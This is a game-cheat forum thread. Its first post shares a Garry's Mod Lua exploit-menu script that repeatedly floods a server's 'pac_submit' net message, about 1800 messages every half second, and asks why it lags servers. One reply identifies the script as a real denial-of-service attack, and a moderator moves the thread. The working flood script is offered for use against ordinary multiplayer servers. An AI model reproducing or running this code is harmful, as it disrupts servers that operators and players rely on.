Results 1 to 3 of 3
  1. #1
    kubid's Avatar
    Join Date
    Mar 2018
    Gender
    male
    Posts
    2
    Reputation
    10
    Thanks
    0

    Why does pac_submit easily lag servers?

    Code:
    local status = ValidNetString("pac_submit")
    if (status) then
    SploitText("Found Exploit: Fake DDoS")
    addExploit( "31","Lags", "I broke it all", function()
     
        if !timer.Exists( "lagger8" ) then
                    timer.Create("lagger8", 0.5, 0, function()
                    for i=1, 1800 do
                    net.Start("pac_submit")
                    net.SendToServer()
                    end
                    end)
                    SploitNotify("Starting Lagger")
                else
                    timer.Remove("lagger8")
                    SploitNotify("Stopping Lagger")
                end
    end);end
    Why does this fuck every server that has this exploit?

  2. #2
    Ally's Avatar
    Join Date
    Dec 2014
    Gender
    female
    Location
       ♥
    Posts
    8,644
    Reputation
    1610
    Thanks
    8,509
    My Mood
    Angelic
    moved to proper section

    Premium Member 22/4/16
    Steam Minion 22/12/2017
    OFPS Minion 5/2/2019
    MMO Minion 5/2/2019
    Minion+ 5/2/2019
    Mod 8/11/2020
    Retired 3/10/2022
    23 / Dec 7, 2001
    Discord: @im.ally

  3. #3
    eth0s's Avatar
    Join Date
    Oct 2015
    Gender
    male
    Posts
    188
    Reputation
    10
    Thanks
    1,894
    Becasue it does?

    Anyway

    SploitText("Found Exploit: Fake DDoS")

    "Fake DDoS"

    What you are doing is a denial of service attack on servers, so this isn't "fake".

Similar Threads

  1. Why does Fraps make me lag so much?
    By Zed in forum General Gaming
    Replies: 13
    Last Post: 04-16-2011, 10:26 AM
  2. [Help] Why does computer lag when you use hack?
    By blackmage312 in forum WarRock Discussions
    Replies: 11
    Last Post: 01-08-2011, 08:02 AM
  3. Why does the servers freeze?
    By ZEROI9 in forum Combat Arms Help
    Replies: 13
    Last Post: 06-14-2010, 08:11 AM
  4. Why does it lag when i use Hacks...?!
    By schokk21 in forum WarRock Discussions
    Replies: 15
    Last Post: 11-14-2009, 09:58 AM
  5. Why does Combat Arms keep losing connection to the server?!
    By Shamrock in forum Combat Arms Hacks & Cheats
    Replies: 8
    Last Post: 12-30-2008, 03:56 PM